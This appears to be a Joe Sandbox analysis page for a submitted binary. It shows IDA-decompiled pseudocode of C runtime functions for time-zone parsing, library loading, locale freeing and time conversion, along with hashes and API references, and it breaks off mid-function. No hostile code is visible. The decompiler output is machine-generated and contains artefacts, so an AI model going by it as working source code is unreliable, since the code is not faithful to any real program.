Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 565ff9ba47fdc4fc91d53b51459a790f2262e0bef158e0fc89152da30089b770
Instruction ID: ab83f57ca2086600e86bfae138b83650277422d9a833ffb40bf414d343fce8f7
Opcode Fuzzy Hash: 565ff9ba47fdc4fc91d53b51459a790f2262e0bef158e0fc89152da30089b770
Instruction Fuzzy Hash: A5316F71928301DFEF21AB79DA45B9AB3E8AF00314F15652AF49CF7261DB31EC849750

Uniqueness

Uniqueness Score: -1.00%

Function 00E93E93 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E93E93(void* __eflags, void* __fp0, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed short _v32;
				signed int _v36;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v124;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t93;
				void* _t96;
				signed int _t101;
				signed int _t103;
				long _t105;
				signed int* _t108;
				signed int _t109;
				signed int _t117;
				signed int _t120;
				signed int _t123;
				signed short _t124;
				signed short _t129;
				void* _t131;
				void* _t141;
				signed int _t142;
				signed int _t144;
				void* _t146;
				void* _t147;
				signed int _t156;
				signed short _t158;
				void* _t159;
				void* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t167;
				signed short* _t169;
				intOrPtr* _t171;
				signed int _t172;
				signed int _t186;
				signed short* _t188;
				signed short* _t194;
				void* _t199;
				signed int _t200;
				signed int _t201;
				signed short _t202;
				signed int _t203;
				signed short* _t204;
				signed int _t206;
				signed short* _t207;
				signed int _t208;
				void* _t209;
				signed short _t210;
				signed short _t211;
				signed short* _t212;
				intOrPtr* _t213;
				signed int _t214;
				signed int _t216;
				signed int _t222;
				signed int _t226;
				signed int _t230;
				void* _t231;
				void* _t232;
				void* _t234;
				signed int _t235;
				void* _t236;
				signed int _t237;
				void* _t243;
				void* _t244;
				void* _t268;

				_t268 = __fp0;
				_v28 = E00E93A23();
				_v12 = E00E93A29();
				_t166 = 0;
				_v32 = 0;
				_v8 = 0;
				_v16 = 0;
				if(E00E93A87( &_v8) != 0 || E00E93A2F( &_v16) != 0) {
					L47:
					_push(_t166);
					_push(_t166);
					_push(_t166);
					_push(_t166);
					_push(_t166);
					L00E7CF2F();
					asm("int3");
					_t234 = _t236;
					_t237 = _t236 - 0xc;
					_push(_t166);
					_push(_t216);
					_push(_t212);
					_t213 = E00E93A23();
					_t167 = E00E93A29();
					_t48 =  &_v76; // 0xe9435d
					_v76 = 0;
					_v80 = 0;
					_v84 = 0;
					_t82 = E00E93A87(_t48);
					__eflags = _t82;
					if(_t82 != 0) {
						L60:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						L00E7CF2F();
						asm("int3");
						_push(_t234);
						_t235 = _t237;
						_t84 =  *0xed8944; // 0xccebfc3b
						_v124 = _t84 ^ _t235;
						 *0xed8eb4 =  *0xed8eb4 | 0xffffffff;
						 *0xed8ea8 =  *0xed8ea8 | 0xffffffff;
						_push(_t167);
						_push(0);
						_push(_t213);
						 *0xeded50 = 0;
						_t88 = L00E9D78B(0, _t213, 0xec21f8, __eflags,  &_v640,  &_v636, 0x100, 0xec21f8);
						__eflags = _t88;
						if(_t88 != 0) {
							__eflags = _t88 - 0x22;
							if(_t88 == 0x22) {
								_t214 = E00E8E95D(_v532 + _v532);
								__eflags = _t214;
								if(__eflags != 0) {
									_t93 = L00E9D78B(0, _t214, 0xec21f8, __eflags,  &_v536, _t214, _v532, 0xec21f8);
									__eflags = _t93;
									if(_t93 == 0) {
										E00E8EC89(0);
									} else {
										_push(_t214);
										goto L68;
									}
								} else {
									_push(0);
									L68:
									E00E8EC89();
									_t214 = 0;
								}
							} else {
								_t214 = 0;
							}
						} else {
							_t214 =  &_v528;
						}
						asm("sbb esi, esi");
						_t222 =  ~(_t214 -  &_v528) & _t214;
						__eflags = _t214;
						if(_t214 == 0) {
							L76:
							L48();
						} else {
							__eflags =  *_t214;
							if(__eflags == 0) {
								goto L76;
							} else {
								_push(_t214);
								E00E93E93(__eflags, _t268);
							}
						}
						_t96 = E00E8EC89(_t222);
						__eflags = _v16 ^ _t235;
						return E00E76672(_t96, 0, _v16 ^ _t235, _t205, _t214, _t222);
					} else {
						_t101 = E00E93A2F( &_v16);
						__eflags = _t101;
						if(_t101 != 0) {
							goto L60;
						} else {
							_t103 = E00E93A5B( &_v20);
							__eflags = _t103;
							if(_t103 != 0) {
								goto L60;
							} else {
								E00E8EC89( *0xeded48);
								 *0xeded48 = 0;
								 *_t237 = 0xeded58;
								_t105 = GetTimeZoneInformation(??);
								__eflags = _t105 - 0xffffffff;
								if(_t105 != 0xffffffff) {
									_t206 =  *0xeded58 * 0x3c;
									_t186 = 1;
									__eflags =  *0xeded9e; // 0x0
									_t226 =  *0xededac; // 0x0
									 *0xeded50 = 1;
									_v12 = _t206;
									if(__eflags != 0) {
										_t120 = _t226 * 0x3c + _t206;
										__eflags = _t120;
										_v12 = _t120;
									}
									__eflags =  *0xededf2;
									if( *0xededf2 == 0) {
										L57:
										_t109 = 0;
										_t186 = 0;
										__eflags = 0;
									} else {
										_t117 =  *0xedee00; // 0x0
										__eflags = _t117;
										if(_t117 == 0) {
											goto L57;
										} else {
											_t109 = (_t117 - _t226) * 0x3c;
										}
									}
									_v16 = _t186;
									_v20 = _t109;
									E00E79BD0(_t213,  *_t167, 0, 0x80);
									__eflags = 0;
									E00E79BD0(_t213,  *((intOrPtr*)(_t167 + 4)), 0, 0x80);
									E00E79BD0(_t213,  *_t213, 0, 0x40);
									E00E79BD0(_t213,  *((intOrPtr*)(_t213 + 4)), 0, 0x40);
									E00E8CB36(_t206, _t268);
									E00E94373(_t167, _t206, _t213, _t114, _t268, 0xeded5c,  *_t167,  *_t213, _t114);
									E00E94373(_t167, _t206, _t213, _t114, _t268, 0xededb0,  *((intOrPtr*)(_t167 + 4)),  *((intOrPtr*)(_t213 + 4)), _t114);
								}
								_t62 =  &_v12; // 0xe9435d
								 *(E00E93A1D()) =  *_t62;
								 *(E00E93A11()) = _v16;
								_t108 = E00E93A17();
								 *_t108 = _v20;
								return _t108;
							}
						}
					}
				} else {
					_t123 =  *0xeded48; // 0x0
					_t8 =  &_a4; // 0xe94355
					_t212 =  *_t8;
					if(_t123 == 0) {
						L11:
						_t188 = _t212;
						_t207 =  &(_t188[1]);
						do {
							_t124 =  *_t188;
							_t188 =  &(_t188[1]);
						} while (_t124 != _t166);
						_t230 = E00E8E95D(2 + (_t188 - _t207 >> 1) * 2);
						if(_t230 == 0) {
							L44:
							return E00E8EC89(_t230);
						}
						E00E8EC89( *0xeded48);
						_t194 = _t212;
						_t205 = _t230;
						_t216 = _t166;
						 *0xeded48 = _t230;
						_v24 = _t216;
						_t169 =  &(_t194[1]);
						do {
							_t129 =  *_t194;
							_t194 =  &(_t194[1]);
						} while (_t129 != _v32);
						_t131 = E00E88E65(_t205, (_t194 - _t169 >> 1) + 1, _t212);
						_t236 = _t236 + 0xc;
						if(_t131 == 0) {
							_t18 =  &_v12; // 0xe94355
							E00E79BD0(_t212,  *((intOrPtr*)( *_t18)), _t131, 0x80);
							E00E79BD0(_t212,  *((intOrPtr*)( *_t18 + 4)), 0, 0x80);
							_t171 = _v28;
							E00E79BD0(_t212,  *_t171, 0, 0x40);
							E00E79BD0(_t212,  *((intOrPtr*)(_t171 + 4)), 0, 0x40);
							_t22 =  &_v12; // 0xe94355
							_push(3);
							_push( *_t171);
							_push( *((intOrPtr*)( *_t22)));
							L00E93E4C(_t268, _t212);
							_t243 = _t236 + 0x40;
							_t141 = 3;
							do {
								if( *_t212 != 0) {
									_t212 =  &(_t212[1]);
								}
								_t141 = _t141 - 1;
							} while (_t141 != 0);
							_t142 =  *_t212 & 0x0000ffff;
							_v36 = _t142;
							_t199 = 0x2d;
							if(_t142 == _t199) {
								_t212 =  &(_t212[1]);
							}
							_t144 = E00E8ED17(_t199, _t268, _t212,  &_v20, 0xa);
							_t244 = _t243 + 0xc;
							_t172 = _t144 * 0xe10;
							_v8 = _t172;
							while(1) {
								_t200 =  *_t212 & 0x0000ffff;
								if(_t200 != 0x2b && _t200 - 0x30 > 9) {
									break;
								}
								_t212 =  &(_t212[1]);
							}
							_t146 = 0x3a;
							__eflags = _t200 - _t146;
							if(_t200 != _t146) {
								L39:
								_t147 = 0x2d;
								__eflags = _v36 - _t147;
								if(_v36 == _t147) {
									_t172 =  ~_t172;
									_v8 = _t172;
								}
								_t201 =  *_t212 & 0x0000ffff;
								__eflags = _t201;
								_v16 = 0 | _t201 != 0x00000000;
								__eflags = _t201;
								if(_t201 != 0) {
									_push(3);
									_push( *((intOrPtr*)(_v28 + 4)));
									_push( *((intOrPtr*)(_v12 + 4)));
									L00E93E4C(_t268, _t212);
									_t172 = _v8;
								}
								 *(E00E93A1D()) = _t172;
								 *(E00E93A11()) = _v16;
								goto L44;
							}
							_t212 =  &(_t212[1]);
							_t156 = E00E8ED17(_t200, _t268, _t212,  &_v20, 0xa);
							_t244 = _t244 + 0xc;
							_t202 = 0x30;
							_t172 = _v8 + _t156 * 0x3c;
							_v32 = _t202;
							_t158 =  *_t212 & 0x0000ffff;
							_v8 = _t172;
							_t208 = _t158;
							__eflags = _t158 - _t202;
							if(_t158 < _t202) {
								L33:
								_t159 = 0x3a;
								__eflags = _t208 - _t159;
								if(_t208 != _t159) {
									goto L39;
								}
								_t212 =  &(_t212[1]);
								_t161 = E00E8ED17(_t202, _t268, _t212,  &_v20, 0xa);
								_t244 = _t244 + 0xc;
								_t172 = _v8 + _t161;
								_t162 =  *_t212 & 0x0000ffff;
								_v8 = _t172;
								_t209 = 0x30;
								__eflags = _t162 - _t209;
								if(_t162 < _t209) {
									goto L39;
								}
								_t203 = _t162;
								_t231 = 0x39;
								while(1) {
									__eflags = _t203 - _t231;
									if(_t203 > _t231) {
										break;
									}
									_t212 =  &(_t212[1]);
									_t163 =  *_t212 & 0x0000ffff;
									_t203 = _t163;
									__eflags = _t163 - _t209;
									if(_t163 >= _t209) {
										continue;
									}
									break;
								}
								_t230 = _v24;
								goto L39;
							}
							_t202 = _t158;
							_t232 = 0x39;
							while(1) {
								_t208 = _t202 & 0x0000ffff;
								__eflags = _t202 - _t232;
								if(_t202 > _t232) {
									break;
								}
								_t212 =  &(_t212[1]);
								_t164 =  *_t212 & 0x0000ffff;
								_t202 = _t164;
								_t208 = _t164;
								__eflags = _t164 - _v32;
								if(_t164 >= _v32) {
									continue;
								}
								break;
							}
							_t230 = _v24;
							goto L33;
						}
						_t166 = 0;
						__eflags = 0;
						goto L47;
					} else {
						_t204 = _t212;
						while(1) {
							_t210 =  *_t204;
							if(_t210 !=  *_t123) {
								break;
							}
							if(_t210 == 0) {
								L8:
								_t165 = _t166;
							} else {
								_t211 = _t204[1];
								if(_t211 !=  *((intOrPtr*)(_t123 + 2))) {
									break;
								} else {
									_t204 =  &(_t204[2]);
									_t123 = _t123 + 4;
									if(_t211 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t165 == 0) {
								return _t165;
							} else {
								goto L11;
							}
							goto L78;
						}
						asm("sbb eax, eax");
						_t165 = _t123 | 0x00000001;
						__eflags = _t165;
						goto L10;
					}
				}
				L78:
			}

0x00e93e93
0x00e93ea3
0x00e93eab
0x00e93eae
0x00e93eb3
0x00e93eb7
0x00e93eba
0x00e93ec5
0x00e94129
0x00e94129
0x00e9412a
0x00e9412b
0x00e9412c
0x00e9412d
0x00e9412e
0x00e94133
0x00e94137
0x00e94139
0x00e9413c
0x00e9413d
0x00e9413e
0x00e94144
0x00e9414b
0x00e9414f
0x00e94152
0x00e94156
0x00e94159
0x00e9415c
0x00e94162
0x00e94164
0x00e94283
0x00e94283
0x00e94284
0x00e94285
0x00e94286
0x00e94287
0x00e94288
0x00e9428d
0x00e94290
0x00e94291
0x00e94299
0x00e942a0
0x00e942a3
0x00e942b0
0x00e942b7
0x00e942b8
0x00e942b9
0x00e942ce
0x00e942d5
0x00e942dd
0x00e942df
0x00e942e9
0x00e942ec
0x00e94300
0x00e94303
0x00e94305
0x00e94320
0x00e94328
0x00e9432a
0x00e94330
0x00e9432c
0x00e9432c
0x00000000
0x00e9432c
0x00e94307
0x00e94307
0x00e94308
0x00e94308
0x00e9430d
0x00e9430d
0x00e942ee
0x00e942ee
0x00e942ee
0x00e942e1
0x00e942e1
0x00e942e1
0x00e94342
0x00e94344
0x00e94346
0x00e94348
0x00e94358
0x00e94358
0x00e9434a
0x00e9434a
0x00e9434d
0x00000000
0x00e9434f
0x00e9434f
0x00e94350
0x00e94355
0x00e9434d
0x00e9435e
0x00e94369
0x00e94372
0x00e9416a
0x00e9416e
0x00e94174
0x00e94176
0x00000000
0x00e9417c
0x00e94180
0x00e94186
0x00e94188
0x00000000
0x00e9418e
0x00e94194
0x00e94199
0x00e9419f
0x00e941a6
0x00e941ac
0x00e941af
0x00e941b5
0x00e941be
0x00e941bf
0x00e941c6
0x00e941cc
0x00e941d2
0x00e941d5
0x00e941da
0x00e941da
0x00e941dc
0x00e941dc
0x00e941df
0x00e941e7
0x00e941f9
0x00e941f9
0x00e941fb
0x00e941fb
0x00e941e9
0x00e941e9
0x00e941ee
0x00e941f0
0x00000000
0x00e941f2
0x00e941f4
0x00e941f4
0x00e941f0
0x00e94202
0x00e94206
0x00e9420d
0x00e94213
0x00e94219
0x00e94223
0x00e9422e
0x00e94238
0x00e94244
0x00e94258
0x00e9425d
0x00e94260
0x00e94268
0x00e94272
0x00e94277
0x00e9427d
0x00e94282
0x00e94282
0x00e94188
0x00e94176
0x00e93edd
0x00e93edd
0x00e93ee2
0x00e93ee2
0x00e93ee7
0x00e93f1e
0x00e93f1e
0x00e93f20
0x00e93f23
0x00e93f23
0x00e93f26
0x00e93f29
0x00e93f3f
0x00e93f44
0x00e9411b
0x00000000
0x00e94121
0x00e93f50
0x00e93f56
0x00e93f58
0x00e93f5a
0x00e93f5c
0x00e93f62
0x00e93f65
0x00e93f68
0x00e93f68
0x00e93f6b
0x00e93f6e
0x00e93f7e
0x00e93f83
0x00e93f88
0x00e93f8e
0x00e93f99
0x00e93fa9
0x00e93fae
0x00e93fb8
0x00e93fc5
0x00e93fca
0x00e93fcd
0x00e93fcf
0x00e93fd1
0x00e93fd4
0x00e93fd9
0x00e93fe0
0x00e93fe1
0x00e93fe4
0x00e93fe6
0x00e93fe6
0x00e93fe9
0x00e93fe9
0x00e93fee
0x00e93ff5
0x00e93ff8
0x00e93ffc
0x00e93ffe
0x00e93ffe
0x00e94008
0x00e9400d
0x00e94010
0x00e94016
0x00e94019
0x00e94019
0x00e9401f
0x00000000
0x00000000
0x00e9402a
0x00e9402a
0x00e94031
0x00e94032
0x00e94035
0x00e940cf
0x00e940d1
0x00e940d2
0x00e940d6
0x00e940d8
0x00e940da
0x00e940da
0x00e940dd
0x00e940e2
0x00e940e8
0x00e940eb
0x00e940ee
0x00e940f3
0x00e940f5
0x00e940fb
0x00e940ff
0x00e94104
0x00e94107
0x00e9410f
0x00e94119
0x00000000
0x00e94119
0x00e94040
0x00e94045
0x00e9404d
0x00e94055
0x00e94056
0x00e94058
0x00e9405b
0x00e9405e
0x00e94061
0x00e94063
0x00e94066
0x00e94088
0x00e9408a
0x00e9408b
0x00e9408e
0x00000000
0x00000000
0x00e94095
0x00e9409a
0x00e940a2
0x00e940a5
0x00e940a7
0x00e940aa
0x00e940af
0x00e940b0
0x00e940b3
0x00000000
0x00000000
0x00e940b7
0x00e940b9
0x00e940ba
0x00e940ba
0x00e940bd
0x00000000
0x00000000
0x00e940bf
0x00e940c2
0x00e940c5
0x00e940c7
0x00e940ca
0x00000000
0x00000000
0x00000000
0x00e940ca
0x00e940cc
0x00000000
0x00e940cc
0x00e9406a
0x00e9406c
0x00e9406d
0x00e9406d
0x00e94070
0x00e94073
0x00000000
0x00000000
0x00e94075
0x00e94078
0x00e9407b
0x00e9407d
0x00e9407f
0x00e94083
0x00000000
0x00000000
0x00000000
0x00e94083
0x00e94085
0x00000000
0x00e94085
0x00e94127
0x00e94127
0x00000000
0x00e93ee9
0x00e93ee9
0x00e93eeb
0x00e93eeb
0x00e93ef1
0x00000000
0x00000000
0x00e93ef6
0x00e93f0d
0x00e93f0d
0x00e93ef8
0x00e93ef8
0x00e93f00
0x00000000
0x00e93f02
0x00e93f02
0x00e93f05
0x00e93f0b
0x00000000
0x00000000
0x00000000
0x00000000
0x00e93f0b
0x00e93f00
0x00e93f16
0x00e93f18
0x00e94126
0x00000000
0x00000000
0x00000000
0x00000000
0x00e93f18
0x00e93f11
0x00e93f13
0x00e93f13
0x00000000
0x00e93f13
0x00e93ee7
0x00000000

APIs

_free.LIBCMT ref: 00E93F50
_free.LIBCMT ref: 00E9411C
_free.LIBCMT ref: 00E94194
GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00E94355,?,?,00000000), ref: 00E941A6

Strings

]C, xrefs: 00E9414F, 00E94260, 00E94155
UC, xrefs: 00E93F8E, 00E93FCA, 00E93F97, 00E93FD1
UC, xrefs: 00E93EE2, 00E93E9D, 00E93F78, 00E93FD3, 00E94007, 00E94044, 00E94099, 00E940FE, 00E9413E

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: UC$UC$]C
API String ID: 597776487-3680221906
Opcode ID: 44701a53e21eec9d8386b11587e3950450331c99b956bd3e212009d7c563df8e
Instruction ID: cac7289222dd788d720a6db4ce376e2117af3f2802054db5a9d7b3bb02400674
Opcode Fuzzy Hash: 44701a53e21eec9d8386b11587e3950450331c99b956bd3e212009d7c563df8e
Instruction Fuzzy Hash: 64A114B2900215AFDF10BFB5EC46AAE7BB9EF40314F14516AF904BB291EB719E41C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E90033 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E90033(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xedec40 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xebe280 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00E8E26E(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00E8E26E(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00e9003c
0x00e900e6
0x00e90044
0x00e90046
0x00e9004d
0x00e9004f
0x00e90055
0x00e90062
0x00e90077
0x00e9007b
0x00e900cd
0x00e900cd
0x00e900d2
0x00e900d6
0x00e900d9
0x00e900d9
0x00e900df
0x00e900e1
0x00e900f6
0x00e900f1
0x00e900f5
0x00e900f5
0x00e900e3
0x00e900e3
0x00000000
0x00e900e3
0x00e9007d
0x00e90086
0x00e900bd
0x00e900bd
0x00e900bf
0x00e900c1
0x00000000
0x00000000
0x00e900c9
0x00000000
0x00e900c9
0x00e90090
0x00e90095
0x00e9009a
0x00000000
0x00000000
0x00e900a4
0x00e900a9
0x00e900ae
0x00000000
0x00000000
0x00e900b3
0x00e900b9
0x00000000
0x00e900b9
0x00e9005a
0x00000000
0x00000000
0x00000000
0x00e90060
0x00e900ef
0x00000000

Strings

ext-ms-, xrefs: 00E9009E
api-ms-, xrefs: 00E9008A

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: fef2eb949edf5192bcbb2b9fb2a0029b786a6dd3835962b009fc4dcb0c86eb11
Instruction ID: d200924ef01b186a0a459c68e26c0e285133881e8ce519e5b7dffa2632db43bb
Opcode Fuzzy Hash: fef2eb949edf5192bcbb2b9fb2a0029b786a6dd3835962b009fc4dcb0c86eb11
Instruction Fuzzy Hash: 6621E431A02320EFDF315B259C44BAB7758AF05B64F642A11ED16B72A1E730ED00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E96DA3 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E96DA3(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00E96AEF(_t45, 7);
					E00E96AEF(_t45 + 0x1c, 7);
					E00E96AEF(_t45 + 0x38, 0xc);
					E00E96AEF(_t45 + 0x68, 0xc);
					E00E96AEF(_t45 + 0x98, 2);
					E00E8EC89( *((intOrPtr*)(_t45 + 0xa0)));
					E00E8EC89( *((intOrPtr*)(_t45 + 0xa4)));
					E00E8EC89( *((intOrPtr*)(_t45 + 0xa8)));
					E00E96AEF(_t45 + 0xb4, 7);
					E00E96AEF(_t45 + 0xd0, 7);
					E00E96AEF(_t45 + 0xec, 0xc);
					E00E96AEF(_t45 + 0x11c, 0xc);
					E00E96AEF(_t45 + 0x14c, 2);
					E00E8EC89( *((intOrPtr*)(_t45 + 0x154)));
					E00E8EC89( *((intOrPtr*)(_t45 + 0x158)));
					E00E8EC89( *((intOrPtr*)(_t45 + 0x15c)));
					return E00E8EC89( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00e96da9
0x00e96dae
0x00e96db7
0x00e96dc2
0x00e96dcd
0x00e96dd8
0x00e96de6
0x00e96df1
0x00e96dfc
0x00e96e07
0x00e96e15
0x00e96e23
0x00e96e34
0x00e96e42
0x00e96e50
0x00e96e5b
0x00e96e66
0x00e96e71
0x00000000
0x00e96e81
0x00e96e86

APIs

Part of subcall function 00E96AEF: _free.LIBCMT ref: 00E96B14

_free.LIBCMT ref: 00E96DF1

Part of subcall function 00E8EC89: HeapFree.KERNEL32(00000000,00000000,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?), ref: 00E8EC9F
Part of subcall function 00E8EC89: GetLastError.KERNEL32(?,?,00E96B19,?,00000000,?,?,?,00E96DBC,?,00000007,?,?,00E973B2,?,?), ref: 00E8ECB1

_free.LIBCMT ref: 00E96DFC
_free.LIBCMT ref: 00E96E07
_free.LIBCMT ref: 00E96E5B
_free.LIBCMT ref: 00E96E66
_free.LIBCMT ref: 00E96E71
_free.LIBCMT ref: 00E96E7C

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 19819d5cab3d69d3db10b2d0ee7c6680dad567709245d65b06aa0ad9845c4bf1
Instruction ID: ece8a3d555dd686871f80a9c0d314add6c702f1ff3faf805a48697c2c426af70
Opcode Fuzzy Hash: 19819d5cab3d69d3db10b2d0ee7c6680dad567709245d65b06aa0ad9845c4bf1
Instruction Fuzzy Hash: FE112E71940B54EBDA61BBB0CD07FCBB7DCAF04740F409916B29DB6152EAB5FA048790

Uniqueness

Uniqueness Score: -1.00%

Function 00E891B8 Relevance: 9.3, APIs: 6, Instructions: 270
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E891B8(void* __edx, void* __fp0, void _a4) {
				void* _v4;
				char _v12;
				void _v16;
				char _v20;
				void _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				void* _t65;
				void _t68;
				void* _t69;
				void _t71;
				void _t73;
				void _t75;
				intOrPtr _t78;
				void _t79;
				void* _t80;
				void _t82;
				void* _t83;
				void _t85;
				void _t91;
				void _t100;
				void _t104;
				void* _t107;
				void* _t108;
				void _t111;
				void _t113;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				void* _t123;
				void _t126;
				void* _t134;
				void _t136;
				intOrPtr _t139;
				void _t141;
				void _t145;
				void* _t146;
				void* _t148;
				void* _t150;
				void* _t151;
				void _t153;
				void _t154;
				void _t155;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t160;
				void* _t162;

				_t162 = __fp0;
				_t134 = __edx;
				E00E8908E(_a4);
				asm("int3");
				while(1) {
					_push(_t156);
					_t157 = _t159;
					_t160 = _t159 - 0x14;
					_push(_t151);
					_t151 = _v4;
					_t161 = _t151;
					if(_t151 == 0) {
						break;
					}
					_push(_t141);
					_t118 = 9;
					memset(_t151, _t62 | 0xffffffff, _t118 << 2);
					_t159 = _t160 + 0xc;
					_t141 = _a4;
					__eflags = _t141;
					if(__eflags != 0) {
						_push(0);
						__eflags =  *(_t141 + 4);
						if(__eflags > 0) {
							L8:
							_t65 = 7;
							__eflags =  *(_t141 + 4) - _t65;
							if(__eflags < 0) {
								L15:
								E00E943B5(0, _t134, _t141, _t151, __eflags, _t162);
								_v16 = 0;
								_v20 = 0;
								_v12 = 0;
								_t68 = E00E93A2F( &_v16);
								__eflags = _t68;
								if(_t68 != 0) {
									L48:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_t62 = L00E7CF2F();
									asm("int3");
									_t156 = _t157;
									continue;
								}
								_t73 = E00E93A5B( &_v20);
								__eflags = _t73;
								if(_t73 != 0) {
									goto L48;
								}
								_t75 = E00E93A87( &_v12);
								__eflags = _t75;
								if(_t75 != 0) {
									goto L48;
								}
								_t123 =  *_t141;
								_t111 =  *(_t141 + 4);
								_t136 = _t123 + 0xfffc0b7f;
								asm("adc eax, 0xffffffff");
								__eflags = _t111 - 7;
								if(__eflags > 0) {
									L26:
									_push(_t141);
									_push(_t151);
									_t71 = E00E87BF1();
									__eflags = _t71;
									if(_t71 != 0) {
										L12:
										L13:
										L14:
										return _t71;
									}
									__eflags = _v16;
									asm("cdq");
									_t145 =  *_t151;
									_t113 = _t136;
									if(__eflags == 0) {
										L30:
										_t78 = _v12;
										L31:
										asm("cdq");
										_t146 = _t145 - _t78;
										asm("sbb ebx, edx");
										_t79 = L00E9F750(_t146, _t113, 0x3c, 0);
										 *_t151 = _t79;
										__eflags = _t79;
										if(_t79 < 0) {
